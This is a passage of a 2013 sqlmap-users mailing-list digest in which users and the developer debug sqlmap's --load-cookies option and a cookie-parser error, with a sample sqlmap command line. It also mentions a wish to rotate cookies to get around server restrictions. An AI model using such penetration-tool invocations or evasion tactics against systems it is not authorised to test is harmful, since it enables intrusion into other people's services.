> >> have any customization that allows me to bypass this restriction like
> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
> "autoconf"
> >> that measure the permited query size.
> >>
> >> There is some chance to put this kind of feature in sqlmap?
> >>
> >> Thanks.
> >>
> >> --
> >> David Gomes Guimar?es
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Own the Future-Intel&reg; Level Up Game Demo Contest 2013
> >> Rise to greatness in Intel's independent game demo contest.
> >> Compete for recognition, cash, and the chance to get your game
> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
>
>
> --
> David Gomes Guimar?es
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 2
> Date: Mon, 15 Apr 2013 11:36:37 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
>   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
>     assert domain_specified == initial_dot
> AssertionError
>
>   _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> >     Hi Dirk.
> >
> >     Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com       TRUE    /       FALSE   1429089794      MUID
> 333995A69E06630B2EB491169F016314
> .bing.com       TRUE    /       FALSE   0       _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com       TRUE    /       FALSE   0       _HOP
> .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> >     Kind regards,
> >     Miroslav Stampar
> >
> >
> >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >         Hi Miroslav,
> >
> >         thx for your prompt answer.
> >
> >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >         > Hi Dirk.
> >         >
> >         > Could you please get the latest revision and retry it again?
> >         ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> >         >
> >         > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> >         >
> >         > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> >         sure, here you go:
> >
> >         --snip
> >         # Netscape HTTP Cookie File
> >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> \t  <Cookie>
> >         [..]
> >         --snap
> >
> >         They are all session cookies. For easier reading here I put some
> blanks in the line
> >         above, in "cookie-file" there aren't any though. Cookies were
> generated with
> >         stompy and a shell script (looks he same as with
> >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> >         >
> >         > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> >         see above.
> >
> >         Cheers,
> >
> >         Dirk
> >
> >         >
> >         >
> >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >         >
> >         >     Hi Miroslav,
> >         >
> >         >     yes unfortunately.
> >         >
> >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >         >     seems to take the first cookie issued by the server with
> set-cookie (and
> >         >     put's it silently in).
> >         >
> >         >     Cheers,
> >         >
> >         >     Dirk
> >         >
> >         >
> >         >
> >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >         >     > Hi.
> >         >     >
> >         >     > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> >         >     >
> >         >     > Kind regards,
> >         >     > Miroslav Stampar
> >         >     >
> >         >     >
> >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >         >     >
> >         >     >
> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 15 Apr 2013 11:45:19 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Dirk Wetter <sp...@dr...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your
> needs?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
> >
> >
> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > > Nevertheless, with the latest commit that check should be "neutralized"
> > now. Could you please retry it now?
> >
> > thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> > hiccups, using the same file:
> >
> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
> bug!
> > Traceback (most recent call last):
> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> > _really_load
> >     assert domain_specified == initial_dot
> > AssertionError
> >
> >   _warn_unhandled_exception()
> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> >
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> > the 999.. looks strange to me.
> >
> > >
> > >
> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> > mir...@gm... <mailto:mir...@gm...>> wrote:
> > >
> > >     Hi Dirk.
> > >
> > >     Well, I would say that you have an expired cookie. Do you see that
> > value 0? That value should be a valid UNIX time representing time of
> cookie
> > expiration. Also, I've just tested that cookie of yours and sqlmap says:
> > "[WARNING] cookie '....' has expired"
> > >
> >
> > that's true but IMO 0 represents just a session cookie. Example:
> >
> > prompt% wget -q -O /dev/null --keep-session-cookies
> > --save-cookies=/dev/stdout bing.com
> > # HTTP cookie file.
> > # Generated by Wget on 2013-04-15 11:23:13.
> > # Edit at your own risk.
> >
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> > AUTOREDIR=0&GEOVAR=&DOB=20130415
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> > D=2781203&MS=2781203&AF=NOFORM
> > .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> >  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> > .bing.com       TRUE    /       FALSE   1429089794      MUID
> >  333995A69E06630B2EB491169F016314
> > .bing.com       TRUE    /       FALSE   0       _SS
> > SID=B954CB7EDF8643CABAD8013F27A241E7
> > .bing.com       TRUE    /       FALSE   0       _HOP
> > .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> > .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> > www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> > www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> > 333995A69E06630B2EB491169F016314
> >
> > prompt%
> >
> > Same parser problem btw if I edit the cookie file and put 1429089794 unix
> > time instead of 0 in there.
> >
> > Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> > but cookies w/ expiration date) and uses the last
> > cookie only for the first 120 tries.
> >
> > Cheers, Dirk
> >
> >
> > >
> > >     Kind regards,
> > >     Miroslav Stampar
> > >
> > >
> > >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
> <mailto:
> > sp...@dr...>> wrote:
> > >
> > >
> > >         Hi Miroslav,
> > >
> > >         thx for your prompt answer.
> > >
> > >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > >         > Hi Dirk.
> > >         >
> > >         > Could you please get the latest revision and retry it again?
> > >         ed5599f: almost the same: with cookie in the header sqlmap
> takes
> > only this one.
> > >         The slight difference seems to be that in the case where I
> > didn't supply a cookie
> > >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> > the server anymore.
> > >         >
> > >         > There was a situation where info messages have been wrongly
> > written that original response contained Set-Cookie in situations like
> > yours.
> > >         >
> > >         > In case that everything stays as it is, I'll need to ask you
> > to provide more details. For example, cookie file would be great.
> > >
> > >         sure, here you go:
> > >
> > >         --snip
> > >         # Netscape HTTP Cookie File
> > >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> >  \t  <Cookie>
> > >         [..]
> > >         --snap
> > >
> > >         They are all session cookies. For easier reading here I put
> some
> > blanks in the line
> > >         above, in "cookie-file" there aren't any though. Cookies were
> > generated with
> > >         stompy and a shell script (looks he same as with
> > >         wget -S -O /dev/null --keep-session-cookies
> > --save-cookies=<file> <URL>)
> > >
> > >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> > file ;-)
> > >
> > >         >
> > >         > Also, please make sure that the cookie file contains proper
> > cookie(s) - domain name should be the same as a domain of target, cookie
> > needs to have a proper valid time, etc.
> > >
> > >         see above.
> > >
> > >         Cheers,
> > >
> > >         Dirk
> > >
> > >         >
> > >         >
> > >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>>> wrote:
> > >         >
> > >         >     Hi Miroslav,
> > >         >
> > >         >     yes unfortunately.
> > >         >
> > >         >     If I omit the cookie line in the request header
> > completely, sqlmap
> > >         >     seems to take the first cookie issued by the server with
> > set-cookie (and
> > >         >     put's it silently in).
> > >         >
> > >         >     Cheers,
> > >         >
> > >         >     Dirk
> > >         >
> > >         >
> > >         >
> > >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > >         >     > Hi.
> > >         >     >
> > >         >     > And this is also happening if you are skipping "Cookie:
> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > >         >     >
> > >         >     > Kind regards,
> > >         >     > Miroslav Stampar
> > >         >     >
> > >         >     >
> > >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > >         >     >
> > >         >     >
> > >         >     >     Hi folks,
> > >         >     >
> > >         >     >     .... that doesn't work for me. It always uses the
> > cookie supplied
> > >         >     >     (below in $REQUEST, or if I omit the line in
> > $REQUEST the one
> > >         >     >     from the 1st server reply is being used)
> > >         >     >
> > >         >     >     So what is wrong in here:
> > >         >     >
> > >         >     >     cd
> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > >         >     >       --level=2 --risk=2 -r $REQUEST
> > >         >     >
> > >         >     >     The content of the file $REQUEST is:
> > >         >     >
> > >         >     >     POST <URL> HTTP/1.1
> > >         >     >     Host: <HOST>
> > >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT
> 5.2;
> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > >         >     >     Accept:
> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > >         >     >     Accept-Language: en-US,en;q=0.5
> > >         >     >     Accept-Encoding: gzip, deflate
> > >         >     >     Referer: <Referer>
> > >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > >         >     >     Connection: keep-alive
> > >         >     >     Content-Type: application/x-www-form-urlencoded
> > >         >     >     Content-Length: 67
> > >         >     >
> > >         >     >     <abunchofpostparams>
> > >         >     >
> > >         >     >
> > >         >     >     No hints that cookie-file is not in correct format
> > (I've been through this,
> > >         >     >     at least I think I so ;) ).
> > >         >     >
> > >         >     >     Any insight would be much appreciated.
> > >         >     >
> > >         >     >
> > >         >     >     Cheers,
> > >         >     >
> > >         >     >     Dirk
> > >         >     >
> > >         >     >
> > >         >     >
> >
> ------------------------------------------------------------------------------
> > >         >     >     Precog is a next-generation analytics platform
> > capable of advanced
> > >         >     >     analytics on semi-structured data. The platform
> > includes APIs for building
> > >         >     >     apps and a phenomenal toolset for data science.
> > Developers can use
> > >         >     >     our toolset for easy data analysis & visualization.
> > Get a free account!
> > >         >     >
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > >         >     >     _______________________________________________
> > >         >     >     sqlmap-users mailing list
> > >         >     >     sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>> <mailto:
> > sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>>>
> > >         >     >
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     > --
> > >         >     > Miroslav Stampar
> > >         >     > http://about.me/stamparm
> > >         >
> > >         >
> > >         >
> > >         >
> > >         > --
> > >         > Miroslav Stampar
> > >         > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > >     --
> > >     Miroslav Stampar
> > >     http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 4
> Date: Mon, 15 Apr 2013 11:46:21 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
> clean_filesystem
> To: Brandon Perry <bpe...@gm...>
> Cc: sqlmap users <sql...@li...>
> Message-ID:
> <CA+9yoX3RNQDm=PqT...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Brandon.
>
> Thank you for your patch and find it now included [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>
>
> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
> >wrote:
>
> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> > call when self.output_directory is NoneType and clean_system() is called.
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 5
> Date: Mon, 15 Apr 2013 12:19:13 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Miroslav,
>
> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Now that crash should be "patched".
> >
> > Could you please retry it now and say if the latest revision suits your
> needs?
>
> cool, thx. Works!
>
> However (sorry):
>
> One needs to omit the cookie in the request header, otherwise it just uses
> the one
> supplied by the request.
>
> Then: It doesn't change the cookie. Maybe I was interpreting that not
> correctly
> but my point was using the load-cookies option to direct sqlmap to change
> cookies once in a while (whenever that's gonna be). This is to circumvent
> restrictions one can encounter otherwise....
>
> Cheers,
>
> Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >
> >     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> >     > Nevertheless, with the latest commit that check should be
> "neutralized" now. Could you please retry it now?
> >
> >     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser
> lib hiccups, using the same file:
> >
> >     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning:
> cookielib bug!
> >     Traceback (most recent call last):
> >       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
> >         assert domain_specified == initial_dot
> >     AssertionError
> >
> >       _warn_unhandled_exception()
> >     [11:13:26] [CRITICAL] there was a problem loading cookies file
> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> >     the 999.. looks strange to me.
> >
> >     >
> >     >
> >     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...> <mailto:
> mir...@gm... <mailto:mir...@gm...>>> wrote:
> >     >
> >     >     Hi Dirk.
> >     >
> >     >     Well, I would say that you have an expired cookie. Do you see
> that value 0? That value should be a valid UNIX time representing time of
> cookie expiration. Also, I've just tested that cookie of yours and sqlmap
> says: "[WARNING] cookie '....' has expired"
> >     >
> >
> >     that's true but IMO 0 represents just a session cookie. Example:
> >
> >     prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com <http://bing.com>
> >     # HTTP cookie file.
> >     # Generated by Wget on 2013-04-15 11:23:13.
> >     # Edit at your own risk.
> >
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      MUID    333995A69E06630B2EB491169F016314
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _HOP
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _FS     NU=1
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      _FP     EM=1
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      MUIDB   333995A69E06630B2EB491169F016314
> >
> >     prompt%
> >
> >     Same parser problem btw if I edit the cookie file and put 1429089794
> unix time instead of 0 in there.
> >
> >     Ok: With the prev rev  ed5599f it reads this file ok (no session
> cookies but cookies w/ expiration date) and uses the last
> >     cookie only for the first 120 tries.
> >
> >     Cheers, Dirk
> >
> >
> >     >
> >     >     Kind regards,
> >     >     Miroslav Stampar
> >     >
> >     >
> >     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >     >
> >     >
> >     >         Hi Miroslav,
> >     >
> >     >         thx for your prompt answer.
> >     >
> >     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >     >         > Hi Dirk.
> >     >         >
> >     >         > Could you please get the latest revision and retry it
> again?
> >     >         ed5599f: almost the same: with cookie in the header sqlmap
> takes only this one.
> >     >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >     >         sqlmap doesn't use any cookie at all, i.e. now not the one
> from the server anymore.
> >     >         >
> >     >         > There was a situation where info messages have been
> wrongly written that original response contained Set-Cookie in situations
> like yours.
> >     >         >
> >     >         > In case that everything stays as it is, I'll need to ask
> you to provide more details. For example, cookie file would be great.
> >     >
> >     >         sure, here you go:
> >     >
> >     >         --snip
> >     >         # Netscape HTTP Cookie File
> >     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t
> JSESSIONID  \t  <Cookie>
> >     >         [..]
> >     >         --snap
> >     >
> >     >         They are all session cookies. For easier reading here I
> put some blanks in the line
> >     >         above, in "cookie-file" there aren't any though. Cookies
> were generated with
> >     >         stompy and a shell script (looks he same as with
> >     >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >     >
> >     >         Again: sqlmap doesn't hiccup/complain while eating my
> cookies file ;-)
> >     >
> >     >         >
> >     >         > Also, please make sure that the cookie file contains
> proper cookie(s) - domain name should be the same as a domain of target,
> cookie needs to have a proper valid time, etc.
> >     >
> >     >         see above.
> >     >
> >     >         Cheers,
> >     >
> >     >         Dirk
> >     >
> >     >         >
> >     >         >
> >     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >     >         >
> >     >         >     Hi Miroslav,
> >     >         >
> >     >         >     yes unfortunately.
> >     >         >
> >     >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >     >         >     seems to take the first cookie issued by the server
> with set-cookie (and
> >     >         >     put's it silently in).
> >     >         >
> >     >         >     Cheers,
> >     >         >
> >     >         >     Dirk
> >     >         >
> >     >         >
> >     >         >
> >     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >     >         >     > Hi.
> >     >         >     >
> >     >         >     > And this is also happening if you are skipping
> "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
> request?
> >     >         >     >
> >     >         >     > Kind regards,
> >     >         >     > Miroslav Stampar
> >     >         >     >
> >     >         >     >
> >     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
> >     >         >     >
> >     >         >     >
> >     >         >     >     Hi folks,
> >     >         >     >
> >     >         >     >     .... that doesn't work for me. It always uses
> the cookie supplied
> >     >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >     >         >     >     from the 1st server reply is being used)
> >     >         >     >
> >     >         >     >     So what is wrong in here:
> >     >         >     >
> >     >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >     >         >     >       --threads=8 -v 6
> --load-cookies=$WD/cookie-file \
> >     >         >     >       --level=2 --risk=2 -r $REQUEST
> >     >         >     >
> >     >         >     >     The content of the file $REQUEST is:
> >     >         >     >
> >     >         >     >     POST <URL> HTTP/1.1
> >     >         >     >     Host: <HOST>
> >     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows
> NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >     >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >     >         >     >     Accept-Language: en-US,en;q=0.5
